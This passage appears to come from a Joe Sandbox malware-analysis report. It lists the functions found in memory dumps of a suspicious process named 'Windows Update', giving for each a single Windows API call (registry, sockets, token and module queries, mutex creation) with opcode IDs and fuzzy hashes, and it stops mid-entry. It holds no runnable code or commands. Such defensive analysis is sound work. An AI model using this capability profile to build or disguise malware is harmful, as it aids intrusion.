                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2492992576-0
                                                                                                                    • Opcode ID: a96f6e03c7017e4ad0d9c0ed245a990d1c81a127487885300807b09838f4e3c3
                                                                                                                    • Instruction ID: 2cd24715103eb55268b65671eda3b9dbc33ff48b14defb01932737a27be6b60d
                                                                                                                    • Opcode Fuzzy Hash: a96f6e03c7017e4ad0d9c0ed245a990d1c81a127487885300807b09838f4e3c3
                                                                                                                    • Instruction Fuzzy Hash: 7C31693500E3C05FD7138B358C656A2BFB4EF07224B1D80DBD9C18F5A3D269A849CB62
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 012BB8A3 Relevance: 1.6, APIs: 1, Instructions: 87COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetTokenInformation.KERNELBASE(?,00000E2C,EA433468,00000000,00000000,00000000,00000000), ref: 012BB948
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000E.00000002.358449792.00000000012BA000.00000040.00000800.00020000.00000000.sdmp, Offset: 012BA000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_14_2_12ba000_Windows Update.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: InformationToken
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4114910276-0
                                                                                                                    • Opcode ID: f237da6bdba6b121aecf53adc38f208ee445e911dc6415f3e2504f7f21dd35ef
                                                                                                                    • Instruction ID: a6b5c1c5e64a68d50edb57606300a82bcc9cbf197600aa893a5eaccd289512f4
                                                                                                                    • Opcode Fuzzy Hash: f237da6bdba6b121aecf53adc38f208ee445e911dc6415f3e2504f7f21dd35ef
                                                                                                                    • Instruction Fuzzy Hash: A231B4714087806FEB22CB64DC95FA7BFB8EF06314F08849BE9849B153D224A509CB71
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 05523D28 Relevance: 1.6, APIs: 1, Instructions: 86COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • K32EnumProcessModules.KERNEL32(?,00000E2C,EA433468,00000000,00000000,00000000,00000000), ref: 05523DBE
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000E.00000002.360095276.0000000005520000.00000040.00000800.00020000.00000000.sdmp, Offset: 05520000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_14_2_5520000_Windows Update.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: EnumModulesProcess
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1082081703-0
                                                                                                                    • Opcode ID: ff21d2eff4e0e9fb278a478dfc6589db97a22306ae54cea81097d19c3a8b73ee
                                                                                                                    • Instruction ID: ed2bddde223702de17fb6b254a1b5d5cf97ceb7f99cbedb5b5bd65a2d1513b00
                                                                                                                    • Opcode Fuzzy Hash: ff21d2eff4e0e9fb278a478dfc6589db97a22306ae54cea81097d19c3a8b73ee
                                                                                                                    • Instruction Fuzzy Hash: E021A5725093806FEB128F25DC45B96BFB8EF07710F1984DAE9849F152D264A509CB61
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 05524B47 Relevance: 1.6, APIs: 1, Instructions: 85encryptionCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • CertVerifyCertificateChainPolicy.CRYPT32(?,00000E2C,EA433468,00000000,00000000,00000000,00000000), ref: 05524BDE
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000E.00000002.360095276.0000000005520000.00000040.00000800.00020000.00000000.sdmp, Offset: 05520000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_14_2_5520000_Windows Update.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CertCertificateChainPolicyVerify
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3930008701-0
                                                                                                                    • Opcode ID: 42aa65134fd1f828b697b6e5c4b06d6f2b1d9d4ffa187f0138254a571c3b433f
                                                                                                                    • Instruction ID: 74d309584fcd25b438b3622aa176e03f72ed96b739bca3c5ca89e02ae533a900
                                                                                                                    • Opcode Fuzzy Hash: 42aa65134fd1f828b697b6e5c4b06d6f2b1d9d4ffa187f0138254a571c3b433f
                                                                                                                    • Instruction Fuzzy Hash: CF21BA715097806FEB128F64DC45F66BFB8EF06310F1884DBE984DF292D2699849C771
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0552386A Relevance: 1.6, APIs: 1, Instructions: 84COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • getaddrinfo.WS2_32(?,00000E2C), ref: 0552390F
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000E.00000002.360095276.0000000005520000.00000040.00000800.00020000.00000000.sdmp, Offset: 05520000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_14_2_5520000_Windows Update.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: getaddrinfo
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 300660673-0
                                                                                                                    • Opcode ID: 8e390b73646bbda690278c3e3e801a2f1cd4265c39324e21795b3c04dd5ad23a
                                                                                                                    • Instruction ID: 266ed6d5fe29b8478d0c3aa81591ea56e349c02da70b060f43b286af8829feff
                                                                                                                    • Opcode Fuzzy Hash: 8e390b73646bbda690278c3e3e801a2f1cd4265c39324e21795b3c04dd5ad23a
                                                                                                                    • Instruction Fuzzy Hash: 8B21BF71100204BFFB31DF65CC85FA6FBACEB04710F14885AFA849A281D6B4A509CBB1
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 055231E4 Relevance: 1.6, APIs: 1, Instructions: 83registryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • RegOpenCurrentUser.KERNEL32(?,00000E2C), ref: 0552327D
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000E.00000002.360095276.0000000005520000.00000040.00000800.00020000.00000000.sdmp, Offset: 05520000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_14_2_5520000_Windows Update.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CurrentOpenUser
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1571386571-0
                                                                                                                    • Opcode ID: 2364499c478bf16c7eceadc2d6644f7aa5bc96b740e63cce346e228aac768130
                                                                                                                    • Instruction ID: 8a1f7eeb4fe36d10e8ffbfa4092e7b4406850b7e437007d01ebdc73543475195
                                                                                                                    • Opcode Fuzzy Hash: 2364499c478bf16c7eceadc2d6644f7aa5bc96b740e63cce346e228aac768130
                                                                                                                    • Instruction Fuzzy Hash: 0D21B4714093806FEB228B65DC45F66BFB8EF06314F0988DBED849F153D264A509CB71
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 012BA120 Relevance: 1.6, APIs: 1, Instructions: 82networkCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • gethostname.WS2_32(?,00000E2C,?,?), ref: 012BA1BD
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000E.00000002.358449792.00000000012BA000.00000040.00000800.00020000.00000000.sdmp, Offset: 012BA000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_14_2_12ba000_Windows Update.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: gethostname
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 144339138-0
                                                                                                                    • Opcode ID: 69dfd1b12c4e39ded4f22d6e1b25e20e24afd19823b0d23874bcb156a9bdc118
                                                                                                                    • Instruction ID: 1562e0740ef186083a7f65c153827ebd381a88047970ac70e1c97b718b75d574
                                                                                                                    • Opcode Fuzzy Hash: 69dfd1b12c4e39ded4f22d6e1b25e20e24afd19823b0d23874bcb156a9bdc118
                                                                                                                    • Instruction Fuzzy Hash: 3021AD7140D3C06FD7038B768C51A66BFB4EF47610F1981DBD8848F293D229A909CBA2
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 05523F14 Relevance: 1.6, APIs: 1, Instructions: 81COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • K32GetModuleFileNameExW.KERNEL32(?,00000E2C,?,?), ref: 05523FBA
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000E.00000002.360095276.0000000005520000.00000040.00000800.00020000.00000000.sdmp, Offset: 05520000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_14_2_5520000_Windows Update.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FileModuleName
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 514040917-0
                                                                                                                    • Opcode ID: 42a0ba706905c7d0590f37b44b1811d964c975e7f86c9a556fb16d6ab6f8aad0
                                                                                                                    • Instruction ID: f1d60cc03b1726ada3edda94681a9c831df28d337da6a676003434bca64a27fb
                                                                                                                    • Opcode Fuzzy Hash: 42a0ba706905c7d0590f37b44b1811d964c975e7f86c9a556fb16d6ab6f8aad0
                                                                                                                    • Instruction Fuzzy Hash: 8C21A0714093C06FD7128B65CC55B66BFB4EF47610F1980DBD8848F293D624A909CBB2
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0552330A Relevance: 1.6, APIs: 1, Instructions: 78registryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • RegOpenKeyExW.KERNEL32(?,00000E2C), ref: 05523389
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000E.00000002.360095276.0000000005520000.00000040.00000800.00020000.00000000.sdmp, Offset: 05520000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_14_2_5520000_Windows Update.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Open
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 71445658-0
                                                                                                                    • Opcode ID: 705ed6eabd1df932ee5a2264a40277de9b3e061c873e4c71de9000ffeaa09498
                                                                                                                    • Instruction ID: d0accfe645bfc919a899ec37e9cc1d2ee480537d5a9af53bd0d2944f0f752b62
                                                                                                                    • Opcode Fuzzy Hash: 705ed6eabd1df932ee5a2264a40277de9b3e061c873e4c71de9000ffeaa09498
                                                                                                                    • Instruction Fuzzy Hash: 2D21AF72500204AEEB21DF59DC84F6BBBACEF14710F14886AED85DB241D678E509CBB1
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 055233F7 Relevance: 1.6, APIs: 1, Instructions: 78registryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • RegNotifyChangeKeyValue.KERNEL32(?,00000E2C,EA433468,00000000,00000000,00000000,00000000), ref: 05523488
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000E.00000002.360095276.0000000005520000.00000040.00000800.00020000.00000000.sdmp, Offset: 05520000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_14_2_5520000_Windows Update.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ChangeNotifyValue
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3933585183-0
                                                                                                                    • Opcode ID: d7fb2f01b72d45dc16a5d2c7340338978fed80ebc30d92d3e418b2bcfafcbd56
                                                                                                                    • Instruction ID: 67a916debb76045fe0b43f80c35cb21878215227468df3ec9ef9464beb3b7a84
                                                                                                                    • Opcode Fuzzy Hash: d7fb2f01b72d45dc16a5d2c7340338978fed80ebc30d92d3e418b2bcfafcbd56
                                                                                                                    • Instruction Fuzzy Hash: DD218371405384AFDB22CF65DC85F97FFB8EF06310F04889BE9859B152D229A509CB71
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 055207A8 Relevance: 1.6, APIs: 1, Instructions: 78COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • RasEnumConnectionsW.RASAPI32(?,00000E2C,?,?), ref: 05520842
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000E.00000002.360095276.0000000005520000.00000040.00000800.00020000.00000000.sdmp, Offset: 05520000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_14_2_5520000_Windows Update.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ConnectionsEnum
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3832085198-0
                                                                                                                    • Opcode ID: ab6bfe397e328f2aa6624b5a7000e99dd595869eeec90ac3242c96d677dc7a7c
                                                                                                                    • Instruction ID: cc8dffdd3b639d01b0424b18ed57734ed7518005b1184eb5c552f3bfedd44c7d
                                                                                                                    • Opcode Fuzzy Hash: ab6bfe397e328f2aa6624b5a7000e99dd595869eeec90ac3242c96d677dc7a7c
                                                                                                                    • Instruction Fuzzy Hash: 9D21C8754093806FD3138B25CC41B62BFB4EF87720F0981DBE8848B553D224A919CBB2
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 05521D5E Relevance: 1.6, APIs: 1, Instructions: 76registryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • RegQueryValueExW.KERNEL32(?,00000E2C,EA433468,00000000,00000000,00000000,00000000), ref: 05521DFC
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000E.00000002.360095276.0000000005520000.00000040.00000800.00020000.00000000.sdmp, Offset: 05520000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_14_2_5520000_Windows Update.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: QueryValue
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3660427363-0
                                                                                                                    • Opcode ID: 70e5587ff513f5df94d8c863ceffb6e7f8449e7fd3719e774d2c4fb87050126d
                                                                                                                    • Instruction ID: d6f68a5778328581967c25d98e58a7fd73bce804ef79c909dcc5dc93175b3cc5
                                                                                                                    • Opcode Fuzzy Hash: 70e5587ff513f5df94d8c863ceffb6e7f8449e7fd3719e774d2c4fb87050126d
                                                                                                                    • Instruction Fuzzy Hash: 0B217F72509780AFE722CB15DC84F67BFF8AF46710F08849AE9859B292D265E508CB61
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0552290F Relevance: 1.6, APIs: 1, Instructions: 75COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetAdaptersAddresses.IPHLPAPI(?,00000E2C,EA433468,00000000,00000000,00000000,00000000), ref: 055229A1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000E.00000002.360095276.0000000005520000.00000040.00000800.00020000.00000000.sdmp, Offset: 05520000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_14_2_5520000_Windows Update.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AdaptersAddresses
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2506852604-0
                                                                                                                    • Opcode ID: 9a1f541e8657bdf81158f31fe228c6ff9d2a7b55970c0a4e736bae30dce9869b
                                                                                                                    • Instruction ID: f47c09c1fa0e3b25ddd7673555be0b304507a20ed143aa32b0808566f8faf2ff
                                                                                                                    • Opcode Fuzzy Hash: 9a1f541e8657bdf81158f31fe228c6ff9d2a7b55970c0a4e736bae30dce9869b
                                                                                                                    • Instruction Fuzzy Hash: E521B8754093807FDB228F25CC44FA6FFB8EF06310F1884DBE9849B192D265A549CB71
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0552350A Relevance: 1.6, APIs: 1, Instructions: 73registryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • RegOpenKeyExW.KERNEL32(?,00000E2C), ref: 0552357E
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000E.00000002.360095276.0000000005520000.00000040.00000800.00020000.00000000.sdmp, Offset: 05520000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_14_2_5520000_Windows Update.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Open
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 71445658-0
                                                                                                                    • Opcode ID: ca25d9582f07b780a7574e253f6ed10d1fe4993b1ce2e3b4847da8ec94d381c0
                                                                                                                    • Instruction ID: 09036a3476dfb44ec612074a389f550d1fafe5e7449c7e6c92078e959b5ed0c6
                                                                                                                    • Opcode Fuzzy Hash: ca25d9582f07b780a7574e253f6ed10d1fe4993b1ce2e3b4847da8ec94d381c0
                                                                                                                    • Instruction Fuzzy Hash: 1F219F72600200AEEB219F59DC85F6BFBA8EF04710F148C6AED849B251D678E509CBB1
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 05522F62 Relevance: 1.6, APIs: 1, Instructions: 72networkCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • WSAIoctl.WS2_32(?,00000E2C,EA433468,00000000,00000000,00000000,00000000), ref: 05522FDD
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000E.00000002.360095276.0000000005520000.00000040.00000800.00020000.00000000.sdmp, Offset: 05520000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_14_2_5520000_Windows Update.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Ioctl
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3041054344-0
                                                                                                                    • Opcode ID: b4629dd717d8c11800799d42ec8bad930ebae7a7e51a6a128887c6894d106983
                                                                                                                    • Instruction ID: 2b3d43cd625f0571bcd7b01659ade2d3355e999def0f781f419495df033ae12a
                                                                                                                    • Opcode Fuzzy Hash: b4629dd717d8c11800799d42ec8bad930ebae7a7e51a6a128887c6894d106983
                                                                                                                    • Instruction Fuzzy Hash: 04216875504600AFEB21CF55DC81FA6FBE8FF09710F1888AAED858B291D675E409CB71
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 055224A2 Relevance: 1.6, APIs: 1, Instructions: 72synchronizationCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • CreateMutexW.KERNEL32(?,?), ref: 05522515
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000E.00000002.360095276.0000000005520000.00000040.00000800.00020000.00000000.sdmp, Offset: 05520000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_14_2_5520000_Windows Update.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateMutex
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1964310414-0
                                                                                                                    • Opcode ID: 259cef0f2f98d738f94ae468eff38a17d60418d2761cf69feb0f03d2c88303d9
                                                                                                                    • Instruction ID: 4e719c09081dee57330a4d2daa0d4c57fa3e264da633482f566fcea471d62aa9
                                                                                                                    • Opcode Fuzzy Hash: 259cef0f2f98d738f94ae468eff38a17d60418d2761cf69feb0f03d2c88303d9
                                                                                                                    • Instruction Fuzzy Hash: C921AC75604240AFE720DF29DC85B66FBE8FF09310F1484AEED858B281D675E508CB75
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 05523118 Relevance: 1.6, APIs: 1, Instructions: 71COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • RasConnectionNotificationW.RASAPI32(?,00000E2C,EA433468,00000000,00000000,00000000,00000000), ref: 055231A7
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000E.00000002.360095276.0000000005520000.00000040.00000800.00020000.00000000.sdmp, Offset: 05520000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_14_2_5520000_Windows Update.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ConnectionNotification
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1402429939-0
                                                                                                                    • Opcode ID: 94dbccfa5e6c6bd4ad247a724b219446bbf395ff57d459d72170ec493a01a8e4
                                                                                                                    • Instruction ID: d1f8f7616440e6000c7628c3a18c86bc702d23d5bb8e64bf2294ff0872b267cb
                                                                                                                    • Opcode Fuzzy Hash: 94dbccfa5e6c6bd4ad247a724b219446bbf395ff57d459d72170ec493a01a8e4
                                                                                                                    • Instruction Fuzzy Hash: 6421B0714097846FEB228B25DC45F66FFB8EF06314F0984DBE9849B193D269A508CB71
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 05522026 Relevance: 1.6, APIs: 1, Instructions: 68COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • OpenFileMappingW.KERNELBASE(?,?), ref: 05522091
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000E.00000002.360095276.0000000005520000.00000040.00000800.00020000.00000000.sdmp, Offset: 05520000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_14_2_5520000_Windows Update.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FileMappingOpen
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1680863896-0
                                                                                                                    • Opcode ID: 44ea60b10e5de7515bcf53192e522d18cfbfb0ffe929e1e013a4d37f628a6c44
                                                                                                                    • Instruction ID: 47af7b8d8825953e53bf153d8a89925daa0311db613bb3ca17239face3c86bf3
                                                                                                                    • Opcode Fuzzy Hash: 44ea60b10e5de7515bcf53192e522d18cfbfb0ffe929e1e013a4d37f628a6c44
                                                                                                                    • Instruction Fuzzy Hash: EA21AE75500240AFE721DF29CC85B66FBE8EF05320F1484AEED858B291D675F808CB76
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 05523E4A Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • K32GetModuleInformation.KERNEL32(?,00000E2C,EA433468,00000000,00000000,00000000,00000000), ref: 05523EAE
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000E.00000002.360095276.0000000005520000.00000040.00000800.00020000.00000000.sdmp, Offset: 05520000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_14_2_5520000_Windows Update.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: InformationModule
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3425974696-0
                                                                                                                    • Opcode ID: 9d757047ada80df89ce5426e9f1a47d95aeb85378f6bcdc28aafa38ac766e757
                                                                                                                    • Instruction ID: 616d7b2f9553af70d06ce824f669713af61f65e5b88c3da92d13ae28354c1666
                                                                                                                    • Opcode Fuzzy Hash: 9d757047ada80df89ce5426e9f1a47d95aeb85378f6bcdc28aafa38ac766e757
                                                                                                                    • Instruction Fuzzy Hash: 3F118171500240AFEB20CF19DC85F6AFBE8EF05710F1488AAED45CB291D678E409CBB1
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 05522126 Relevance: 1.6, APIs: 1, Instructions: 67fileCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000E.00000002.360095276.0000000005520000.00000040.00000800.00020000.00000000.sdmp, Offset: 05520000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_14_2_5520000_Windows Update.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FileView
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3314676101-0
                                                                                                                    • Opcode ID: 5577ec6ca3dc3adc0e1db23459bfe58a55a33bff55673641461b38223098ae11
                                                                                                                    • Instruction ID: 588c8754db3b507183fd8b40d0ef2d5a7df18390bdc4a9948ff5dead9e3b27ac
                                                                                                                    • Opcode Fuzzy Hash: 5577ec6ca3dc3adc0e1db23459bfe58a55a33bff55673641461b38223098ae11
                                                                                                                    • Instruction Fuzzy Hash: AF21AE75500640AFE721CF1ADD85F6AFBE8FF09320F14849EEA848B291D675A509CB61
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 055219AE Relevance: 1.6, APIs: 1, Instructions: 67networkCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • WSASocketW.WS2_32(?,?,?,?,?), ref: 05521A1A
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000E.00000002.360095276.0000000005520000.00000040.00000800.00020000.00000000.sdmp, Offset: 05520000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_14_2_5520000_Windows Update.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Socket
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 38366605-0
                                                                                                                    • Opcode ID: 02a67f640aa756e351c89d419e15d980a4baaa9b58532bd30d92899fe406cbee
                                                                                                                    • Instruction ID: d64f0e72005d21059a243d6892f4dd20b6785c6e9478e7ab77be089b75b198de
                                                                                                                    • Opcode Fuzzy Hash: 02a67f640aa756e351c89d419e15d980a4baaa9b58532bd30d92899fe406cbee
                                                                                                                    • Instruction Fuzzy Hash: 7A21CF71500740AFEB21CF59DC44B66FBE8FF09310F14886EED858A691D375A408CBB1
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0552321A Relevance: 1.6, APIs: 1, Instructions: 66registryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • RegOpenCurrentUser.KERNEL32(?,00000E2C), ref: 0552327D
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000E.00000002.360095276.0000000005520000.00000040.00000800.00020000.00000000.sdmp, Offset: 05520000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_14_2_5520000_Windows Update.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CurrentOpenUser
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1571386571-0
                                                                                                                    • Opcode ID: 4c42ee89c28c9c8b9249825950c923e970789f63352c7db675cfc2cd3c469447
                                                                                                                    • Instruction ID: f02f9156df3385bf113520e3cf90a78d5f9067987fd3bb4df3b03c9d142a789e
                                                                                                                    • Opcode Fuzzy Hash: 4c42ee89c28c9c8b9249825950c923e970789f63352c7db675cfc2cd3c469447
                                                                                                                    • Instruction Fuzzy Hash: 10119371500244BEEB21DF59DC85F7AFBA8FF05720F14886BED849F241D678A5098BB1
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0552341E Relevance: 1.6, APIs: 1, Instructions: 65registryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • RegNotifyChangeKeyValue.KERNEL32(?,00000E2C,EA433468,00000000,00000000,00000000,00000000), ref: 05523488
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000E.00000002.360095276.0000000005520000.00000040.00000800.00020000.00000000.sdmp, Offset: 05520000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_14_2_5520000_Windows Update.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ChangeNotifyValue
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3933585183-0
                                                                                                                    • Opcode ID: 9a6f73548c89e944754d9d2ab9b7f21a7305b52760151812f21f23d2f4f521af
                                                                                                                    • Instruction ID: e8a804152b18806b8dbec5acfd098c96041a80bc00652ca5d3654e590e32829b
                                                                                                                    • Opcode Fuzzy Hash: 9a6f73548c89e944754d9d2ab9b7f21a7305b52760151812f21f23d2f4f521af
                                                                                                                    • Instruction Fuzzy Hash: 0711B471400204AEEB21CF55DD84FAAFBACEF05310F1488ABED459B251D678A509CBB1
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 05525E9A Relevance: 1.6, APIs: 1, Instructions: 65registryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • RegSetValueExW.KERNELBASE(?,00000E2C,EA433468,00000000,00000000,00000000,00000000), ref: 05525F0C
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000E.00000002.360095276.0000000005520000.00000040.00000800.00020000.00000000.sdmp, Offset: 05520000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_14_2_5520000_Windows Update.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Value
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3702945584-0
                                                                                                                    • Opcode ID: 55978c70b02d00056b63ad9ce98e6f83aa1241efe75bc18e63a8b04ec52d3a59
                                                                                                                    • Instruction ID: 3a233a11ae215a0c5d72ca5240b2f66457fe5f085ff5d7c07616349d1a89549c
